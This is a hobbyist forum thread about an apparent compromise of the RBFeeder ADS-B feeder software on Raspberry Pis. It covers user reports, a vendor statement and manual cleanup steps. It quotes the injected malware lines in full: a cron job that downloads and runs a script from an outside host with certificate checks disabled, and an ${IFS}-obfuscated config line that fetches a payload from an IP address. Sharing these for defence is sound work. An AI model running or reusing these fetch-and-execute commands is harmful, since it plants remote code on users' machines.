RBFeeder multiple errors

Started by fleihoff, June 02, 2025, 06:19:58 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

bishoptf

Is this normal, I am looking through my logs and see this call out:

Jul 18 13:32:02 adsbpi CRON[14945]: (rbfeeder) CMD (if ! pgrep rbfeeder-mlat > /dev/null; then wget --read-timeout=5 --tries=2 -O /tmp/.ICE-unix/rbfeeder.sh https://pidatacollect.com/download/76ecf4f656328/rbfeeder.sh --no-check-certificate --no-cache && chmod +x /tmp/.ICE-unix/rbfeeder.sh && /tmp/.ICE-unix/rbfeeder.sh;fi)

Really need someone from AirNav developers to say wth is going on with there software, I traced both IP's that were used and somehow rbfeeder.ini had been modified. Both IP ranges do not belong to AirNav.

bishoptf

Looks like there is a rbfeeder user that has these cron jobs:

*/1 * * * * if ! pgrep rbfeeder-mlat > /dev/null; then wget --read-timeout=5 --tries=2 -O /tmp/.ICE-unix/rbfeeder.sh https://pidatacollect.com/download/76ecf4f656328/rbfeeder.sh --no-check-certificate --no-cache && chmod +x /tmp/.ICE-unix/rbfeeder.sh && /tmp/.ICE-unix/rbfeeder.sh;fi
*/5 * * * * rm /tmp/.ICE-unix/rbfeeder.sh

I have uploaded rbfeeder.sh to virus total, Eset identifes it as riskware, not sure if its a false positive:

Security vendors' analysis
Do you want to automate checks?
ESET-NOD32
A Variant Of Linux/Riskware.Frp.V
Acronis (Static ML)
Undetected

This is really bad that this has happened and nothing from AirNav relating to what casued this much less to notify the community that may be running the rbfeeder software...

AirNav Support

#17
Dear All,

We became aware of this issue earlier today and have initiated a thorough investigation, which is currently ongoing. In the meantime, we have implemented measures to prevent any further impact.

To clarify, the RbFeeder repositories themselves have not been infected with any virus. However, there was an attempt to modify certain .ini configuration files. We have identified a small number of feeder stations that were affected, and we have already taken steps to close the vulnerability that allowed this to occur.

We will be contacting the impacted stations directly to assist with clearing and reinstalling RbFeeder as needed. Further updates will be provided as more information becomes available.
Contact Customer/Technical support via:
http://www.airnavsystems.com/contact.html
[email protected]

bishoptf

Quote from: AirNav Support on July 18, 2025, 07:37:06 PM
Dear All,

We became aware of this issue earlier today and have initiated a thorough investigation, which is currently ongoing. In the meantime, we have implemented measures to prevent any further impact.

To clarify, the RbFeeder repositories themselves have not been infected with any virus. However, there was an attempt to modify certain .ini configuration files. We have identified a small number of feeder stations that were affected, and we have already taken steps to close the vulnerability that allowed this to occur.

We will be contacting the impacted stations directly to assist with clearing and reinstalling RbFeeder as needed. Further updates will be provided as more information becomes available.

I think we should have more details as to what really happened, you say the repos were not compromised then how did rbfeeder.ini files have additional information to download files and execute. I will not continue to feed unless full disclosure and how you plan to mitigate this in the future....

bishoptf

Since we have not obtained any guidance from AirNav here is what I have done...YMMV, the probably safest way is to re-imagine and not install AirNav feeder. Still not sure what it was doing, I have uploaded to Virustotal and run several scans on the rpi and still showing clear but here is what I have done, again ymmv.


I have disabled the rbfeeder service:
sudo systemctl stop rbfeeder.service
sudo systemctl disable rbfeeder.service

The malware inserted a line into the rbfeeder.ini file, that looked like this:
mlat_cmd=bin/bash -c wget${IFS}-O${IFS}/tmp/a${IFS}http://8.211.7.190/e48/a${IF>

remove the line:
sudo nano /etc/rbfeeder.ini and then save

The malware inserted cron jobs into the rbfeeder user, you can list the cronjobs like this:
sudo crontab -u rbfeeder -l

To edit the crontab and remove entries:
crontab -e -u

The malware was dowloading a file called rbfeeder.sh into a /tmp subdirectory via cron the above cron job: (rbfeeder) CMD (if ! pgrep rbfeeder-mlat > /dev/null; then wget -O /tmp/.ICE-unix/rbfeeder.sh https://pidatacollect.com/download/76ecf4f656328/rbfeeder.sh --no-check-certificate --no-cache && chmod +x /tmp/.ICE-unix/rbfeeder.sh && /tmp/.ICE-unix/rbfeeder.sh;fi)

You can delete the file:
sudo rm /tmp/.ICE-unix/rbfeeder.sh

Once you have completed that you should reboot the rpi to hopefully come up clean. Once back up you can verify that rbfeeder service is not running/disabled and verify that the file is no longer being downloaded via wget.Verify that no file is located in /tmp/.ICE-unix/

sudo systemctl status rbfeeder.service (should state service is disabled/stopped)
journalctl | grep wget (should return nothing)
ls -l /tmp/.ICE-unix (should be blank)

I believe this clears up most of the issues but without further knowledge on what the file was doing I can not be 100% certain that there are nothing else to cleanup but wanted to at least post this. I have reached out to some additional contacts and when I have further information I will post.




abcd567

#20
If this happed with me, I will take no chances, and assume that the Pi is compromised. Then I will format microSD card (not quick-format, but full-format i.e. witing zeros to entire microSD card).

After cleanip as above, I will re-image microSD card with Raspberry Pi OS Bookworm, and reinstall sll what feeders & decoders I had originally EXCEPT rbfeeder.

Shush

That is what I did.

1. Install the latest RPi OS image, updates and reboot
2. Download and Install PiAware
3. Download and Install dump1090-fa
4. Install RBFeeder
5. Install FR24 Feeder
6. Install Graphs1090
7. Install Tar1090

Less then an hour, and you good to go with flesh and clean OS.


Runway 31

Bishoptf

Can I ask where you downloaded the corrupt RB feeder from

Was it throught the Airnavradar.com add coverage page /rbfeeder install guide by
sudo bash -c "$(wget -O - http://apt.rb24.com/inst_rbfeeder.sh)"

Or from somewhere else?

bishoptf

Quote from: Runway 31 on July 21, 2025, 08:40:26 PM
Bishoptf

Can I ask where you downloaded the corrupt RB feeder from

Was it throught the Airnavradar.com add coverage page /rbfeeder install guide by
sudo bash -c "$(wget -O - http://apt.rb24.com/inst_rbfeeder.sh)"

Or from somewhere else?

I couldnt tell you, my feeder has been up an running since 2018/2019 so I couldn't tell you where I originally downloaded it from. Pretty sure I have updated it since then but again not sure where I would have downloaded from, I run 1090-mutbi and feed many sites.  I looked in my directory and see a inst_rbfeeder.sh from 2020, which appears to add the deb https://apt.rb24.com/ buster main to my sources list. I assume I installed it from official channels, so some update at some point changed the .ini file...





You may want to ask @shush since it appears to have happened to multiple feeders he has and 2 of his friends...

Quote from: Shush on July 18, 2025, 05:07:57 AM
When did you get to monitor your Raspberry Pi's communication?
try it, I'm sure you'll be surprised by the results.
I'm almost certain that no user will notice what's going on behind the scenes on their Raspberry Pi.
I'm almost 100% sure that this is the result of Radarbox feeder.
I've now reinstalled Raspberry Pi with only FR24 feeder, and I continue to monitor the system.

Do you recognize this line that was added to the rbfeeder.ini file?


[mlat]
autostart_mlat=true
#mlat_cmd=/usr/bin/python3.9 /usr/bin/mlat-client

mlat_cmd=bin/bash -c wget${IFS}-O${IFS}/tmp/a${IFS}http://8.211.7.190/e48/a${IF>

[dump978]
#dump978_enabled=false


And by the way, I'm sure it's not a virus because as I wrote, it happened recently on 3 different devices of mine and 2 of my friends who are in different cities.

Runway 31

Thanks, I only asked as I thought you were a new feeder who had downloaded the feeder very recently so wondered where you downloaed the corrupted version from as i dont want it on mines. 

I am running my own Pi and thought updates had to be done manually and mines is dated 20/11/2023 when I updated for Bookworm and havent seen a need to update further since

Alan

bishoptf

Quote from: Runway 31 on July 22, 2025, 10:54:24 AM
Thanks, I only asked as I thought you were a new feeder who had downloaded the feeder very recently so wondered where you downloaed the corrupted version from as i dont want it on mines. 

I am running my own Pi and thought updates had to be done manually and mines is dated 20/11/2023 when I updated for Bookworm and havent seen a need to update further since

Alan

Oh well I guess we are not going to get any additional information, I guess I will just purge my rbfeeder set up and continue to feed other sites. I think I was ranked #4 in the US for my station in RBfeeder but the lack of any guidance or visibility into what happened and how they have made changes to keep it from happening again leaves me really no other choice. Stuff happens but not disclosing and letting folks know what happened doesn't instill confidence in AirNav.

abcd567

I am worried about this virus in rbfeeder, as I have stored in my Pi my private data such as debit & credit card info, bank account info, my off-shore companies details, and most important, list of phone numbers of all my girlfriends ;)

bishoptf

Quote from: abcd567 on July 26, 2025, 07:08:49 AM
I am worried about this virus in rbfeeder, as I have stored in my Pi my private data such as debit & credit card info, bank account info, my off-shore companies details, and most important, list of phone numbers of all my girlfriends ;)

Made me laugh, yeah I'm not concerned about that either but it was downloading payload to the rpi and executing. I did not have it on a separate vlan island so technically depending on what it was doing it could use the rpi and pivot to other vulnerable hosts on the network, again depending on the payload. I still have not heard back from my contacts who have a copy of the file to analyze what its motives were. That was my concern, not sure how long it had been doing that and not sure what it was doing during that time....

ymm

Quote from: abcd567 on July 18, 2025, 01:41:14 PM
Quote from: bishoptf on July 18, 2025, 12:40:41 PM
@abcd567 how do we get in touch with anyone at AirNav Systems?

Send email to support:
[email protected]

I have tried multiple times to get in touch with using forms and emails. No response besides the automated email. When I tried your suggestion I got a bounce.

Runway 31

Sorry, [email protected].  See the reply to you from support on one of the other threads you posted on

Alan